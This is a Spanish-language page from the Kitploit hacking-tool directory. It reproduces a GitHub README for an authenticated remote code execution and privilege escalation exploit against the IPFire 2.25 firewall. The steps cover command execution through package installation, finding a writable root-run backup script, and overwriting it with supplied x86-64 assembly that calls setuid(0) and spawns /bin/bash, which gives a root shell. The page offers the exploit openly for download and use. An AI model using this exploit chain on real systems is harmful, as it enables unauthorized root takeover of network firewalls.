Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
ipfire-2-25-auth-rce — ipfire 2.25 authenticated remote code execution | Kitploit
Herramientas/GitHubGitHub/kaanaryoverflow/ipfire-2-25-auth-rce
Privilege EscalationVulnerability AnalysisExploitationWeb Application ExploitationPayload DevelopmentBinary Exploitation
GitHubkaanaryoverflow/ipfire-2-25-auth-rce

ipfire-2-25-auth-rce

ipfire 2.25 authenticated remote code execution

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
2hace 5 añosAún no revisado

Ipfire 2-25 (core update 156) rce autenticado

  • el sistema ejecuta un comando al instalar cualquier paquete

packfileinstallation

  • el sistema obtiene 7zip directamente desde el html

pocpc0

  • y comprueba el directorio tmp

pocpc1

  • versión 2.25 - core update 156

version

  • ipfire permite ejecutar comandos arbitrarios del sistema operativo como nobody después del inicio de sesión

¡Sé root!

  • comprueba los binarios suid

find-suid

  • el programa de backup ejecuta otro script. /var/ipfire/backup/bin/backup.pl (es un script bash y los permisos tienen buena pinta)

backup-tespiti

  • intenta escribir en el script bash. (Sin errores. ¡BIEN!)

yazma-denemesi

  • intenta ejecutar bash

yazabilme-kanıtı

  • sí. podemos ejecutarlo pero tiene pocos privilegios. debemos provocar setuid(0)!
  • guarda esto y ejecuta alti name.asm q
  • alti es mi propio programa de comprobación de compilación en el repositorio soo_deep.
root@kitploit:~
bits 64
section .data
  string db "/bin/bash",0x00
  olmadis db "basarisiz.",0x0a,0x00
  olmadil equ $-olmadis
section .text
  global main
main:
  mov rax,105
  mov rdi,0
  syscall
  cmp rax,0
  je getbash

  mov rax,1
  mov rdi,1
  mov rsi,olmadis
  mov rdx,olmadil
  syscall

  mov rax,60
  xor rdi,rdi
  syscall

getbash:
  mov rax,59
  mov rdi,string
  mov rsi,0
  mov rdx,0
  syscall
  • y escribe el nuevo programa en /var/ipfire/backup/bin/backup.pl. (podemos usar un servidor http de python y curl para escribirlo)

  • ¡y disfruta de la shell root!

image

Descargar herramienta